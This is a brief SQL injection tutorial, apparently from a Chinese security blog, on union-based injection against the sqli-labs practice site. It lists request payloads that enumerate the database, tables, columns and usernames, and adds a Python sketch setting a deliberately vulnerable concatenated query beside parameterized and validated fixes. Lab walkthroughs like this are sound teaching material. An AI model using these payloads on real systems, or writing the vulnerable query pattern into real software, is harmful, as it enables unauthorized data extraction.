-- '可控制内容' marks the user-controllable content
SELECT username, email FROM users WHERE username = '可控制内容';
GET /sqli/Less-2/?id=1+order+by+3 HTTP/1.1
GET /sqli/Less-2/?id=-1+union+select+1,2,3 HTTP/1.1
GET /sqli/Less-2/?id=-1+union+select+1,database(),3 HTTP/1.1
GET /sqli/Less-2/?id=-1+union+select+1,(select+table_name+from+information_schema.tables+where+table_schema='security'+limit+0,1),3 HTTP/1.1
GET /sqli/Less-2/?id=-1+union+select+1,(select+column_name+from+information_schema.columns+where+table_schema='security'+and+table_name='users'+limit+0,1),3 HTTP/1.1
GET /sqli/Less-2/?id=-1+union+select+1,(select+username+from+security.users+limit+0,1),3 HTTP/1.1
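Added example (not part of the original article): the `-1 union select 1,2,3` request above only returns attacker-chosen columns when the numeric `id` parameter is concatenated into the statement. The sketch below shows that query shape beside a bound-parameter version and a validated version, using Python's sqlite3 as a stand-in for the lab's MySQL backend; the three-column `users` table, its rows, and all function names are assumptions constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; SQLite in memory stands in for the MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-a"), (2, "bob", "pw-b")])
    return db

def lookup_vulnerable(db, raw_id):
    # Weak form: the request parameter is pasted into the SQL text, so
    # anything after the number is parsed as part of the statement.
    sql = "SELECT id, username, password FROM users WHERE id=" + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    # Hardened form: the parameter is bound as a value and is never parsed
    # as SQL, so a UNION clause inside it is just a non-matching string.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return db.execute(sql, (raw_id,)).fetchall()

def lookup_validated(db, raw_id):
    # Defence in depth: a numeric id must be ASCII digits only; reject
    # everything else before it reaches the database layer.
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(db, raw_id)

if __name__ == "__main__":
    db = make_db()
    payload = "-1 union select 1,2,3"  # decoded form of the request on this page
    print("vulnerable   :", lookup_vulnerable(db, payload))
    print("parameterized:", lookup_parameterized(db, payload))
    try:
        lookup_validated(db, payload)
    except ValueError as exc:
        print("validated    : rejected,", exc)
```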
Originally published on the WeChat official account (Web安全工具库): SQL Injection -- Union Injection Vulnerability